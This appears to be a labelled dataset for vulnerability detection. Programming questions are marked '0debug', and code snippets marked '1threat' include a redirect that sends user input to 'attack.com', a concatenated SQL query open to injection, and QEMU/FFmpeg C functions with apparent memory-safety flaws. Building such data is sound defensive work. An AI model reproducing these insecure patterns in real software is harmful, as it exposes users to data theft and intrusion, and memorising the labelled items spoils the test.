| problem (string, lengths 26 to 131k) | labels (class label, 2 classes) |
|---|---|
Send data to another page - html : <p>Hello, I want to send data from one HTML page to another.</p>
<p>For eg this is my index.html page</p>
<pre><code><html>
<body>
<script>
var uname = "karan"; // I want to send this
</script>
</body>
</html>
</code></pre>
<p>And this is newPage.html:</p>
<pre><code><html>
<body>
<script>
console.log(uname); // I want the uname from index.html
</script>
</body>
</html>
</code></pre>
<p>I have already tried declaring a new class in another JavaScript file, but it gives <code>undefined</code>.</p>
<p>Is there any way I can do this? Thank you</p>
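<p>A hedged sketch of two common options (a variable declared in <code>index.html</code> no longer exists once the browser navigates to <code>newPage.html</code>, so the value has to travel in the URL or in web storage; the file names are taken from the question):</p>
<pre><code><!-- index.html -->
<script>
  var uname = "karan";
  // Option 1: put it in the URL
  // window.location.href = "newPage.html?uname=" + encodeURIComponent(uname);
  // Option 2: keep it in sessionStorage for the next page
  sessionStorage.setItem("uname", uname);
  window.location.href = "newPage.html";
</script>

<!-- newPage.html -->
<script>
  var uname = sessionStorage.getItem("uname");                      // option 2
  // var uname = new URLSearchParams(location.search).get("uname"); // option 1
  console.log(uname); // "karan"
</script>
</code></pre>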
| 0debug
|
Compare two tables in SQL Server 2012 : I have two tables (Grade, StudentMark):
grade
StudentId Mark examId
1 10 1
2 9 2
3 15 1
4 26 3
================================
================================
StudentMark
StudentId Mark examid
1 10 1
2 5 2
3 15 1
4 8 3
I want to compare the data between these two tables, and wherever the marks differ I want to replace Grade(Mark) with StudentMark(Mark) in bulk.
How can I do that?
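One way to do this in SQL Server is a single UPDATE with a join rather than a row-by-row comparison; a sketch assuming the tables are named Grade and StudentMark as shown above:

    UPDATE g
    SET    g.Mark = sm.Mark
    FROM   Grade AS g
    JOIN   StudentMark AS sm
           ON  sm.StudentId = g.StudentId
           AND sm.examid    = g.examId
    WHERE  g.Mark <> sm.Mark;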
| 0debug
|
window.location.href = 'http://attack.com?user=' + user_input;
| 1threat
|
static void net_socket_send(void *opaque)
{
NetSocketState *s = opaque;
int l, size, err;
uint8_t buf1[4096];
const uint8_t *buf;
size = recv(s->fd, buf1, sizeof(buf1), 0);
if (size < 0) {
err = socket_error();
if (err != EWOULDBLOCK)
goto eoc;
} else if (size == 0) {
eoc:
qemu_set_fd_handler(s->fd, NULL, NULL, NULL);
closesocket(s->fd);
return;
}
buf = buf1;
while (size > 0) {
switch(s->state) {
case 0:
l = 4 - s->index;
if (l > size)
l = size;
memcpy(s->buf + s->index, buf, l);
buf += l;
size -= l;
s->index += l;
if (s->index == 4) {
s->packet_len = ntohl(*(uint32_t *)s->buf);
s->index = 0;
s->state = 1;
}
break;
case 1:
l = s->packet_len - s->index;
if (l > size)
l = size;
memcpy(s->buf + s->index, buf, l);
s->index += l;
buf += l;
size -= l;
if (s->index >= s->packet_len) {
qemu_send_packet(s->vc, s->buf, s->packet_len);
s->index = 0;
s->state = 0;
}
break;
}
}
}
| 1threat
|
How can I know how many times the recipient opened the email, or the number of clicks? : <p>I'm working on a Java EE application; one of its features is sending emails using JavaMail.
I have to report on these items: how can I know how many times the recipient opened the email, or the number of clicks?</p>
<p>Thank you in advance for your suggestions</p>
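<p>One common (though imperfect) approach is to track opens with a 1x1 image whose URL identifies the message, and to track clicks by routing every link through your own server before redirecting. A sketch of the HTML you would embed in the JavaMail message body; the endpoints and the <code>msgId</code> parameter are hypothetical and would point at your own Java EE controllers, which increment counters and, for clicks, redirect to the real URL:</p>
<pre><code><!-- open tracking: loaded when the mail client displays remote images -->
<img src="https://yourapp.example.com/track/open?msgId=12345" width="1" height="1" alt=""/>

<!-- click tracking: the link goes through your server first -->
<a href="https://yourapp.example.com/track/click?msgId=12345&target=https%3A%2F%2Fyourapp.example.com%2Foffer">
  See the offer
</a>
</code></pre>
<p>Note that opens are undercounted whenever the recipient's client blocks remote images.</p>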
| 0debug
|
static int open_next_file(AVFormatContext *avf)
{
ConcatContext *cat = avf->priv_data;
unsigned fileno = cat->cur_file - cat->files;
if (cat->cur_file->duration == AV_NOPTS_VALUE)
cat->cur_file->duration = cat->avf->duration - (cat->cur_file->file_inpoint - cat->cur_file->file_start_time);
if (++fileno >= cat->nb_files) {
cat->eof = 1;
return AVERROR_EOF;
}
return open_file(avf, fileno);
}
| 1threat
|
Why does `for (var i in null_object)` enter the loop body more than zero times? : I am trying to save and load a Javascript object of the `{'foo':123}` type in localStorage. I have hit a strange behaviour.
localStorage.setItem('names', null);
alert("names is:" + localStorage.getItem('names'));
for (var n in localStorage.getItem('names'))
{
    alert("#" + n + "#");
}
This gives the following alerts
names is:null
#0#
#1#
#2#
#3#
Why does this happen?
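The reason is that localStorage only stores strings: setItem('names', null) stores the four-character string "null", getItem returns that string, and for...in over a string iterates its indices "0" to "3", which is exactly the output above. A sketch of the usual fix, serializing the object with JSON:

    localStorage.setItem('names', JSON.stringify({'foo': 123}));
    var names = JSON.parse(localStorage.getItem('names'));   // back to a real object
    for (var n in names) {
        alert("#" + n + "#");   // "#foo#"
    }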
| 0debug
|
static void vfio_map_bar(VFIOPCIDevice *vdev, int nr)
{
VFIOBAR *bar = &vdev->bars[nr];
uint64_t size = bar->region.size;
char name[64];
uint32_t pci_bar;
uint8_t type;
int ret;
if (!size) {
return;
}
snprintf(name, sizeof(name), "VFIO %04x:%02x:%02x.%x BAR %d",
vdev->host.domain, vdev->host.bus, vdev->host.slot,
vdev->host.function, nr);
ret = pread(vdev->vbasedev.fd, &pci_bar, sizeof(pci_bar),
vdev->config_offset + PCI_BASE_ADDRESS_0 + (4 * nr));
if (ret != sizeof(pci_bar)) {
error_report("vfio: Failed to read BAR %d (%m)", nr);
return;
}
pci_bar = le32_to_cpu(pci_bar);
bar->ioport = (pci_bar & PCI_BASE_ADDRESS_SPACE_IO);
bar->mem64 = bar->ioport ? 0 : (pci_bar & PCI_BASE_ADDRESS_MEM_TYPE_64);
type = pci_bar & (bar->ioport ? ~PCI_BASE_ADDRESS_IO_MASK :
~PCI_BASE_ADDRESS_MEM_MASK);
memory_region_init_io(&bar->region.mem, OBJECT(vdev), &vfio_region_ops,
bar, name, size);
pci_register_bar(&vdev->pdev, nr, type, &bar->region.mem);
if (vdev->msix && vdev->msix->table_bar == nr) {
size = vdev->msix->table_offset & qemu_real_host_page_mask;
}
strncat(name, " mmap", sizeof(name) - strlen(name) - 1);
if (vfio_mmap_region(OBJECT(vdev), &bar->region, &bar->region.mem,
&bar->region.mmap_mem, &bar->region.mmap,
size, 0, name)) {
error_report("%s unsupported. Performance may be slow", name);
}
if (vdev->msix && vdev->msix->table_bar == nr) {
uint64_t start;
start = REAL_HOST_PAGE_ALIGN((uint64_t)vdev->msix->table_offset +
(vdev->msix->entries *
PCI_MSIX_ENTRY_SIZE));
size = start < bar->region.size ? bar->region.size - start : 0;
strncat(name, " msix-hi", sizeof(name) - strlen(name) - 1);
if (vfio_mmap_region(OBJECT(vdev), &bar->region, &bar->region.mem,
&vdev->msix->mmap_mem,
&vdev->msix->mmap, size, start, name)) {
error_report("%s unsupported. Performance may be slow", name);
}
}
vfio_bar_quirk_setup(vdev, nr);
}
| 1threat
|
void aio_set_fd_poll(AioContext *ctx, int fd,
IOHandler *io_poll_begin,
IOHandler *io_poll_end)
{
}
| 1threat
|
Inserting a newline near the end of a std::string : <p>I'm struggling with trying to implement a C++ code solution that will allow me to insert a newline (i.e. a string literal <code>'\n'</code>) <em>towards the end</em> of a <code>std::string</code>, and <strong>not</strong> at the very end as most implementations show.</p>
<p>For example, I want to insert a <code>'\n'</code> just <code>-1</code> characters before the very end itself. So if the string was 100 characters long (poor analogy I know), then I'd like to insert the string literal at the 99th character in a clean, easily readable manner.</p>
<p>Thanks!</p>
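<p>Since <code>std::string::insert</code> takes a position, inserting one character just before the last one is a one-liner; a minimal sketch (with a guard for very short strings):</p>
<pre><code>#include <iostream>
#include <string>

int main() {
    std::string s = "hello world";
    if (!s.empty())
        s.insert(s.size() - 1, 1, '\n');   // one '\n' before the final character
    std::cout << s << '\n';                // prints "hello worl", a newline, then "d"
    return 0;
}
</code></pre>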
| 0debug
|
Remove all elements from array that match specific string : <p>What is the easiest way to remove all elements from array that match specific string? For example:</p>
<p><code>array = [1,2,'deleted',4,5,'deleted',6,7];</code></p>
<p>I want to remove all <code>'deleted'</code> from the array.</p>
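<p>A minimal sketch using <code>Array.prototype.filter</code>, which returns a new array without the matching elements:</p>
<pre><code>var array = [1, 2, 'deleted', 4, 5, 'deleted', 6, 7];
array = array.filter(function (item) {
    return item !== 'deleted';
});
console.log(array); // [1, 2, 4, 5, 6, 7]
</code></pre>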
| 0debug
|
static uint64_t omap_mcbsp_read(void *opaque, target_phys_addr_t addr,
unsigned size)
{
struct omap_mcbsp_s *s = (struct omap_mcbsp_s *) opaque;
int offset = addr & OMAP_MPUI_REG_MASK;
uint16_t ret;
if (size != 2) {
return omap_badwidth_read16(opaque, addr);
}
switch (offset) {
case 0x00:
if (((s->rcr[0] >> 5) & 7) < 3)
return 0x0000;
case 0x02:
if (s->rx_req < 2) {
printf("%s: Rx FIFO underrun\n", __FUNCTION__);
omap_mcbsp_rx_done(s);
} else {
s->tx_req -= 2;
if (s->codec && s->codec->in.len >= 2) {
ret = s->codec->in.fifo[s->codec->in.start ++] << 8;
ret |= s->codec->in.fifo[s->codec->in.start ++];
s->codec->in.len -= 2;
} else
ret = 0x0000;
if (!s->tx_req)
omap_mcbsp_rx_done(s);
return ret;
}
return 0x0000;
case 0x04:
case 0x06:
return 0x0000;
case 0x08:
return s->spcr[1];
case 0x0a:
return s->spcr[0];
case 0x0c:
return s->rcr[1];
case 0x0e:
return s->rcr[0];
case 0x10:
return s->xcr[1];
case 0x12:
return s->xcr[0];
case 0x14:
return s->srgr[1];
case 0x16:
return s->srgr[0];
case 0x18:
return s->mcr[1];
case 0x1a:
return s->mcr[0];
case 0x1c:
return s->rcer[0];
case 0x1e:
return s->rcer[1];
case 0x20:
return s->xcer[0];
case 0x22:
return s->xcer[1];
case 0x24:
return s->pcr;
case 0x26:
return s->rcer[2];
case 0x28:
return s->rcer[3];
case 0x2a:
return s->xcer[2];
case 0x2c:
return s->xcer[3];
case 0x2e:
return s->rcer[4];
case 0x30:
return s->rcer[5];
case 0x32:
return s->xcer[4];
case 0x34:
return s->xcer[5];
case 0x36:
return s->rcer[6];
case 0x38:
return s->rcer[7];
case 0x3a:
return s->xcer[6];
case 0x3c:
return s->xcer[7];
}
OMAP_BAD_REG(addr);
return 0;
}
| 1threat
|
Webpack loaders vs plugins; what's the difference? : <p>What is the difference between loaders and plugins in webpack? </p>
<p>The <a href="https://webpack.github.io/docs/using-plugins.html">documentation for plugins</a> just says:</p>
<blockquote>
<p>Use plugins to add functionality typically related to bundles in webpack.</p>
</blockquote>
<p>I know that babel uses a loader for jsx/es2015 transforms, but it looks like other common tasks (copy-webpack-plugin, for example) use plugins instead.</p>
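<p>A rough rule of thumb: loaders transform individual files as they are imported and are configured under <code>module.rules</code>, while plugins hook into the whole compilation and are configured under <code>plugins</code>. A minimal config sketch showing one of each; the copy-webpack-plugin options shown are illustrative and vary between its major versions:</p>
<pre><code>// webpack.config.js (illustrative)
const CopyWebpackPlugin = require('copy-webpack-plugin');

module.exports = {
  module: {
    rules: [
      // loader: applied to every matching file that gets imported
      { test: /\.jsx?$/, exclude: /node_modules/, use: 'babel-loader' }
    ]
  },
  plugins: [
    // plugin: operates on the bundle / compilation as a whole
    new CopyWebpackPlugin([{ from: 'static', to: 'assets' }])
  ]
};
</code></pre>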
| 0debug
|
static int mov_read_aclr(MOVContext *c, AVIOContext *pb, MOVAtom atom)
{
int ret = 0;
int length = 0;
uint64_t original_size;
if (c->fc->nb_streams >= 1) {
AVCodecContext *codec = c->fc->streams[c->fc->nb_streams-1]->codec;
if (codec->codec_id == AV_CODEC_ID_H264)
return 0;
if (atom.size == 16) {
original_size = codec->extradata_size;
ret = mov_realloc_extradata(codec, atom);
if (!ret) {
length = mov_read_atom_into_extradata(c, pb, atom, codec, codec->extradata + original_size);
if (length == atom.size) {
const uint8_t range_value = codec->extradata[original_size + 19];
switch (range_value) {
case 1:
codec->color_range = AVCOL_RANGE_MPEG;
break;
case 2:
codec->color_range = AVCOL_RANGE_JPEG;
break;
default:
av_log(c, AV_LOG_WARNING, "ignored unknown aclr value (%d)\n", range_value);
break;
}
av_dlog(c, "color_range: %d\n", codec->color_range);
} else {
av_log(c, AV_LOG_ERROR, "aclr not decoded - incomplete atom\n");
}
} else {
av_log(c, AV_LOG_ERROR, "aclr not decoded - unable to add atom to extradata\n");
}
} else {
av_log(c, AV_LOG_WARNING, "aclr not decoded - unexpected size %"PRId64"\n", atom.size);
}
}
return ret;
}
| 1threat
|
Gradle Sync Failed Android Studio 3.6 : <p>I have just updated the Android Studio from 3.5.3 to 3.6. After this update, I have updated the Gradle and Android SDK Build Tools as well. Now the Gradle sync is failing with these errors:</p>
<pre><code>1. org.gradle.api.internal.artifacts.ivyservice.DefaultLenientConfiguration$ArtifactResolveException:
Could not resolve all artifacts for configuration ':classpath'.
2. org.gradle.internal.resolve.ModuleVersionResolveException: Could not
resolve com.android.tools.build:gradle:3.6.0.
3. org.gradle.internal.resolve.ModuleVersionResolveException: No cached
version of com.android.tools.build:gradle:3.6.0 available for
offline mode.
</code></pre>
<p>Looking at the 3rd error it seems that <strong>Offline Work</strong> needs to be disabled in Android Studio under <strong>Settings -> Build, Execution, Deployment -> Gradle</strong>, but the <strong>Offline Work</strong> checkbox is nowhere to be found in those settings.
Is that the actual problem? If yes, how can it be disabled in <strong>Android Studio 3.6</strong>? If not, what is the problem here?</p>
<p>I have already tried <strong>Invalidate Caches / Restart</strong> but it did not help.</p>
| 0debug
|
Function get_dictionary() in R : There's a function called get_dictionary() in the fastrtext package for R, and I thought it would return all the words in the dictionary. However, when I set wordNgrams to 2 or 3, it returned exactly the same list of words as when I set wordNgrams to 1. Can someone tell me what's going on here? Thanks!
| 0debug
|
RStudio is slow when loading a project / package in development : <p>I have recently experienced a serious problem with RStudio when developing a package. Whenever I open an existing project in RStudio whose versions are controlled with Git, it takes very long to respond to any command. It is also impossible to type something in the console (e.g. 1+1) and obtain the result. Even quitting RStudio has to be done via the task manager. There is no problem when I create a new project / package or when I open an R script directly.</p>
<p>This problem appears both when the project is saved in a Dropbox folder and when it is in a local repository.</p>
<p>To work around this, every time I need to modify my code I create a new project and then move all my current R scripts and the ".git" folder to the new repository.</p>
<p>I would appreciate it if anybody could help me with this issue.</p>
| 0debug
|
Can I activate two network interfaces on EC2 at a time? : I can't activate two network interfaces at the same time. Both interfaces have two private IPs each (four in total), and all are mapped to Elastic IPs,
but I can ping only two of the public IPs.
How can I activate all 4 IPs at the same time?
| 0debug
|
Kotlin: Make an internal function visible for unit tests : <p>In case the tests are in a different module than the production code (which is common), what's the best way to make internal functions visible for tests?</p>
<p>In Java, I would have the production code and the test in the same package and make the methods-to-be-tested package-private (plus, add a <code>@VisibleForTest</code> annotation if the only reason for having it package-private rather than private is the test). Unfortunately, Kotlin doesn't have the concept of package-private.</p>
| 0debug
|
Filtering data with Select (advanced) : <p>I'm working on a project where I have 3 possible filters: by name, city and province. Right now I'm writing simple IFs trying to cover every combination.</p>
<p>Example: it can be [Name][City][All] or [All][City][Province] or [All][All][Province], and so on, for a total of 8 to 9 possibilities. That means I have to write about 8 conditions in my PHP code to catch everything.</p>
<p>So my question is: is there a way in MySQL to write a single SELECT data1.. FROM tableName WHERE ... such that, when I don't supply the city for example, it searches only on the name and the province?</p>
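<p>One common pattern is to make every filter optional inside a single WHERE clause, so one query covers all 8 to 9 combinations; a sketch assuming the columns are called <code>name</code>, <code>city</code> and <code>province</code> and that each placeholder is bound to NULL when "All" is selected:</p>
<pre><code>SELECT data1
FROM   tableName
WHERE  (:name     IS NULL OR name     = :name)
  AND  (:city     IS NULL OR city     = :city)
  AND  (:province IS NULL OR province = :province);
</code></pre>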
| 0debug
|
I developed an Android app which runs on a Lollipop device but crashes on a KitKat device. I am new to Android; please help me find the solution. : apply plugin: 'com.android.application'
android {
    compileSdkVersion 19
    buildToolsVersion '21.1.1'
    defaultConfig {
        applicationId "com.example.itsoft37.kitkat"
        minSdkVersion 11
        targetSdkVersion 19
    }
    buildTypes {
        release {
            minifyEnabled false
            proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.txt'
        }
    }
}
dependencies {
    compile fileTree(dir: 'libs', include: ['*.jar'])
    compile 'com.android.support:appcompat-v7:19.1.0'
}
I am new to Android; please help me find the solution.
The error on the device just says the app has unfortunately stopped.
| 0debug
|
static void rgb24_to_rgb555(AVPicture *dst, AVPicture *src,
int width, int height)
{
const unsigned char *p;
unsigned char *q;
int r, g, b, dst_wrap, src_wrap;
int x, y;
p = src->data[0];
src_wrap = src->linesize[0] - 3 * width;
q = dst->data[0];
dst_wrap = dst->linesize[0] - 2 * width;
for(y=0;y<height;y++) {
for(x=0;x<width;x++) {
r = p[0];
g = p[1];
b = p[2];
((unsigned short *)q)[0] =
((r >> 3) << 10) | ((g >> 3) << 5) | (b >> 3) | 0x8000;
q += 2;
p += 3;
}
p += src_wrap;
q += dst_wrap;
}
}
| 1threat
|
What is the best way to create a class structure from a bill of materials? : <p>For a semester project (in Java) I have to do some material flow optimization. The starting point for the whole task will be a bill of materials. The user should be able to provide it via a file (xml or yaml). My question is now, how can I build class objects (with dependencies) from this bill of materials automatically?</p>
<p>So far I found a serialization/deserialization framework called simple (<a href="http://simple.sourceforge.net/" rel="nofollow noreferrer">http://simple.sourceforge.net/</a>) but I'm not sure if this is the right way to go.</p>
<p>I'm glad for any advice.</p>
| 0debug
|
In angular 2+ how do I communicate between sibling components : <p>I have 3 components I want them to interact with each other.</p>
<p>I tried using services, but that is not solving my problem. I need help with this.</p>
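<p>One common approach is a shared service that owns an RxJS <code>Subject</code>: one sibling pushes values into it and the others subscribe. A minimal sketch; the class and property names are illustrative, and <code>providedIn: 'root'</code> needs Angular 6+ (otherwise register the service in a common parent module):</p>
<pre><code>// message.service.ts (illustrative)
import { Injectable } from '@angular/core';
import { Subject } from 'rxjs';

@Injectable({ providedIn: 'root' })
export class MessageService {
  private messageSource = new Subject<string>();
  message$ = this.messageSource.asObservable();

  send(msg: string) { this.messageSource.next(msg); }
}

// sibling A (fragment):  constructor(private messages: MessageService) {}
//                        this.messages.send('hello from A');
// sibling B (fragment):  this.messages.message$.subscribe(msg => this.latest = msg);
</code></pre>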
| 0debug
|
connection.query('SELECT * FROM users WHERE username = ' + input_string)
| 1threat
|
av_cold int sws_init_context(SwsContext *c, SwsFilter *srcFilter,
SwsFilter *dstFilter)
{
int i;
int usesVFilter, usesHFilter;
int unscaled;
SwsFilter dummyFilter = { NULL, NULL, NULL, NULL };
int srcW = c->srcW;
int srcH = c->srcH;
int dstW = c->dstW;
int dstH = c->dstH;
int dst_stride = FFALIGN(dstW * sizeof(int16_t) + 16, 16);
int dst_stride_px = dst_stride >> 1;
int flags, cpu_flags;
enum AVPixelFormat srcFormat = c->srcFormat;
enum AVPixelFormat dstFormat = c->dstFormat;
const AVPixFmtDescriptor *desc_src = av_pix_fmt_desc_get(srcFormat);
const AVPixFmtDescriptor *desc_dst = av_pix_fmt_desc_get(dstFormat);
cpu_flags = av_get_cpu_flags();
flags = c->flags;
emms_c();
if (!rgb15to16)
ff_rgb2rgb_init();
unscaled = (srcW == dstW && srcH == dstH);
if (!(unscaled && sws_isSupportedEndiannessConversion(srcFormat) &&
av_pix_fmt_swap_endianness(srcFormat) == dstFormat)) {
if (!sws_isSupportedInput(srcFormat)) {
av_log(c, AV_LOG_ERROR, "%s is not supported as input pixel format\n",
sws_format_name(srcFormat));
return AVERROR(EINVAL);
}
if (!sws_isSupportedOutput(dstFormat)) {
av_log(c, AV_LOG_ERROR, "%s is not supported as output pixel format\n",
sws_format_name(dstFormat));
return AVERROR(EINVAL);
}
}
i = flags & (SWS_POINT |
SWS_AREA |
SWS_BILINEAR |
SWS_FAST_BILINEAR |
SWS_BICUBIC |
SWS_X |
SWS_GAUSS |
SWS_LANCZOS |
SWS_SINC |
SWS_SPLINE |
SWS_BICUBLIN);
if (!i) {
if (dstW < srcW && dstH < srcH)
flags |= SWS_GAUSS;
else if (dstW > srcW && dstH > srcH)
flags |= SWS_SINC;
else
flags |= SWS_LANCZOS;
c->flags = flags;
} else if (i & (i - 1)) {
av_log(c, AV_LOG_ERROR,
"Exactly one scaler algorithm must be chosen\n");
return AVERROR(EINVAL);
}
if (srcW < 4 || srcH < 1 || dstW < 8 || dstH < 1) {
av_log(c, AV_LOG_ERROR, "%dx%d -> %dx%d is invalid scaling dimension\n",
srcW, srcH, dstW, dstH);
return AVERROR(EINVAL);
}
if (!dstFilter)
dstFilter = &dummyFilter;
if (!srcFilter)
srcFilter = &dummyFilter;
c->lumXInc = (((int64_t)srcW << 16) + (dstW >> 1)) / dstW;
c->lumYInc = (((int64_t)srcH << 16) + (dstH >> 1)) / dstH;
c->dstFormatBpp = av_get_bits_per_pixel(desc_dst);
c->srcFormatBpp = av_get_bits_per_pixel(desc_src);
c->vRounder = 4 * 0x0001000100010001ULL;
usesVFilter = (srcFilter->lumV && srcFilter->lumV->length > 1) ||
(srcFilter->chrV && srcFilter->chrV->length > 1) ||
(dstFilter->lumV && dstFilter->lumV->length > 1) ||
(dstFilter->chrV && dstFilter->chrV->length > 1);
usesHFilter = (srcFilter->lumH && srcFilter->lumH->length > 1) ||
(srcFilter->chrH && srcFilter->chrH->length > 1) ||
(dstFilter->lumH && dstFilter->lumH->length > 1) ||
(dstFilter->chrH && dstFilter->chrH->length > 1);
getSubSampleFactors(&c->chrSrcHSubSample, &c->chrSrcVSubSample, srcFormat);
getSubSampleFactors(&c->chrDstHSubSample, &c->chrDstVSubSample, dstFormat);
if (isPlanarRGB(dstFormat)) {
if (!(flags & SWS_FULL_CHR_H_INT)) {
av_log(c, AV_LOG_DEBUG,
"%s output is not supported with half chroma resolution, switching to full\n",
av_get_pix_fmt_name(dstFormat));
flags |= SWS_FULL_CHR_H_INT;
c->flags = flags;
}
}
if (flags & SWS_FULL_CHR_H_INT &&
isAnyRGB(dstFormat) &&
!isPlanarRGB(dstFormat) &&
dstFormat != AV_PIX_FMT_RGBA &&
dstFormat != AV_PIX_FMT_ARGB &&
dstFormat != AV_PIX_FMT_BGRA &&
dstFormat != AV_PIX_FMT_ABGR &&
dstFormat != AV_PIX_FMT_RGB24 &&
dstFormat != AV_PIX_FMT_BGR24) {
av_log(c, AV_LOG_ERROR,
"full chroma interpolation for destination format '%s' not yet implemented\n",
sws_format_name(dstFormat));
flags &= ~SWS_FULL_CHR_H_INT;
c->flags = flags;
}
if (isAnyRGB(dstFormat) && !(flags & SWS_FULL_CHR_H_INT))
c->chrDstHSubSample = 1;
c->vChrDrop = (flags & SWS_SRC_V_CHR_DROP_MASK) >>
SWS_SRC_V_CHR_DROP_SHIFT;
c->chrSrcVSubSample += c->vChrDrop;
if (isAnyRGB(srcFormat) && !(flags & SWS_FULL_CHR_H_INP) &&
srcFormat != AV_PIX_FMT_RGB8 && srcFormat != AV_PIX_FMT_BGR8 &&
srcFormat != AV_PIX_FMT_RGB4 && srcFormat != AV_PIX_FMT_BGR4 &&
srcFormat != AV_PIX_FMT_RGB4_BYTE && srcFormat != AV_PIX_FMT_BGR4_BYTE &&
srcFormat != AV_PIX_FMT_GBRP9BE && srcFormat != AV_PIX_FMT_GBRP9LE &&
srcFormat != AV_PIX_FMT_GBRP10BE && srcFormat != AV_PIX_FMT_GBRP10LE &&
srcFormat != AV_PIX_FMT_GBRAP10BE && srcFormat != AV_PIX_FMT_GBRAP10LE &&
srcFormat != AV_PIX_FMT_GBRP12BE && srcFormat != AV_PIX_FMT_GBRP12LE &&
srcFormat != AV_PIX_FMT_GBRP16BE && srcFormat != AV_PIX_FMT_GBRP16LE &&
((dstW >> c->chrDstHSubSample) <= (srcW >> 1) ||
(flags & SWS_FAST_BILINEAR)))
c->chrSrcHSubSample = 1;
c->chrSrcW = AV_CEIL_RSHIFT(srcW, c->chrSrcHSubSample);
c->chrSrcH = AV_CEIL_RSHIFT(srcH, c->chrSrcVSubSample);
c->chrDstW = AV_CEIL_RSHIFT(dstW, c->chrDstHSubSample);
c->chrDstH = AV_CEIL_RSHIFT(dstH, c->chrDstVSubSample);
if (unscaled && !usesHFilter && !usesVFilter &&
(c->srcRange == c->dstRange || isAnyRGB(dstFormat))) {
ff_get_unscaled_swscale(c);
if (c->swscale) {
if (flags & SWS_PRINT_INFO)
av_log(c, AV_LOG_INFO,
"using unscaled %s -> %s special converter\n",
sws_format_name(srcFormat), sws_format_name(dstFormat));
return 0;
}
}
c->srcBpc = desc_src->comp[0].depth;
if (c->srcBpc < 8)
c->srcBpc = 8;
c->dstBpc = desc_dst->comp[0].depth;
if (c->dstBpc < 8)
c->dstBpc = 8;
if (c->dstBpc == 16)
dst_stride <<= 1;
FF_ALLOC_OR_GOTO(c, c->formatConvBuffer,
(FFALIGN(srcW, 16) * 2 * FFALIGN(c->srcBpc, 8) >> 3) + 16,
fail);
if (INLINE_MMXEXT(cpu_flags) && c->srcBpc == 8 && c->dstBpc <= 12) {
c->canMMXEXTBeUsed = (dstW >= srcW && (dstW & 31) == 0 &&
(srcW & 15) == 0) ? 1 : 0;
if (!c->canMMXEXTBeUsed && dstW >= srcW && (srcW & 15) == 0
&& (flags & SWS_FAST_BILINEAR)) {
if (flags & SWS_PRINT_INFO)
av_log(c, AV_LOG_INFO,
"output width is not a multiple of 32 -> no MMXEXT scaler\n");
}
if (usesHFilter)
c->canMMXEXTBeUsed = 0;
} else
c->canMMXEXTBeUsed = 0;
c->chrXInc = (((int64_t)c->chrSrcW << 16) + (c->chrDstW >> 1)) / c->chrDstW;
c->chrYInc = (((int64_t)c->chrSrcH << 16) + (c->chrDstH >> 1)) / c->chrDstH;
if (flags & SWS_FAST_BILINEAR) {
if (c->canMMXEXTBeUsed) {
c->lumXInc += 20;
c->chrXInc += 20;
}
else if (INLINE_MMX(cpu_flags)) {
c->lumXInc = ((int64_t)(srcW - 2) << 16) / (dstW - 2) - 20;
c->chrXInc = ((int64_t)(c->chrSrcW - 2) << 16) / (c->chrDstW - 2) - 20;
}
}
#define USE_MMAP (HAVE_MMAP && HAVE_MPROTECT && defined MAP_ANONYMOUS)
{
#if HAVE_MMXEXT_INLINE
if (c->canMMXEXTBeUsed && (flags & SWS_FAST_BILINEAR)) {
c->lumMmxextFilterCodeSize = init_hscaler_mmxext(dstW, c->lumXInc, NULL,
NULL, NULL, 8);
c->chrMmxextFilterCodeSize = init_hscaler_mmxext(c->chrDstW, c->chrXInc,
NULL, NULL, NULL, 4);
#if USE_MMAP
c->lumMmxextFilterCode = mmap(NULL, c->lumMmxextFilterCodeSize,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0);
c->chrMmxextFilterCode = mmap(NULL, c->chrMmxextFilterCodeSize,
PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0);
#elif HAVE_VIRTUALALLOC
c->lumMmxextFilterCode = VirtualAlloc(NULL,
c->lumMmxextFilterCodeSize,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
c->chrMmxextFilterCode = VirtualAlloc(NULL,
c->chrMmxextFilterCodeSize,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
#else
c->lumMmxextFilterCode = av_malloc(c->lumMmxextFilterCodeSize);
c->chrMmxextFilterCode = av_malloc(c->chrMmxextFilterCodeSize);
#endif
if (!c->lumMmxextFilterCode || !c->chrMmxextFilterCode)
return AVERROR(ENOMEM);
FF_ALLOCZ_OR_GOTO(c, c->hLumFilter, (dstW / 8 + 8) * sizeof(int16_t), fail);
FF_ALLOCZ_OR_GOTO(c, c->hChrFilter, (c->chrDstW / 4 + 8) * sizeof(int16_t), fail);
FF_ALLOCZ_OR_GOTO(c, c->hLumFilterPos, (dstW / 2 / 8 + 8) * sizeof(int32_t), fail);
FF_ALLOCZ_OR_GOTO(c, c->hChrFilterPos, (c->chrDstW / 2 / 4 + 8) * sizeof(int32_t), fail);
init_hscaler_mmxext(dstW, c->lumXInc, c->lumMmxextFilterCode,
c->hLumFilter, c->hLumFilterPos, 8);
init_hscaler_mmxext(c->chrDstW, c->chrXInc, c->chrMmxextFilterCode,
c->hChrFilter, c->hChrFilterPos, 4);
#if USE_MMAP
mprotect(c->lumMmxextFilterCode, c->lumMmxextFilterCodeSize, PROT_EXEC | PROT_READ);
mprotect(c->chrMmxextFilterCode, c->chrMmxextFilterCodeSize, PROT_EXEC | PROT_READ);
#endif
} else
#endif
{
const int filterAlign = X86_MMX(cpu_flags) ? 4 :
PPC_ALTIVEC(cpu_flags) ? 8 : 1;
if (initFilter(&c->hLumFilter, &c->hLumFilterPos,
&c->hLumFilterSize, c->lumXInc,
srcW, dstW, filterAlign, 1 << 14,
(flags & SWS_BICUBLIN) ? (flags | SWS_BICUBIC) : flags,
cpu_flags, srcFilter->lumH, dstFilter->lumH,
c->param, 1) < 0)
goto fail;
if (initFilter(&c->hChrFilter, &c->hChrFilterPos,
&c->hChrFilterSize, c->chrXInc,
c->chrSrcW, c->chrDstW, filterAlign, 1 << 14,
(flags & SWS_BICUBLIN) ? (flags | SWS_BILINEAR) : flags,
cpu_flags, srcFilter->chrH, dstFilter->chrH,
c->param, 1) < 0)
goto fail;
}
}
{
const int filterAlign = X86_MMX(cpu_flags) ? 2 :
PPC_ALTIVEC(cpu_flags) ? 8 : 1;
if (initFilter(&c->vLumFilter, &c->vLumFilterPos, &c->vLumFilterSize,
c->lumYInc, srcH, dstH, filterAlign, (1 << 12),
(flags & SWS_BICUBLIN) ? (flags | SWS_BICUBIC) : flags,
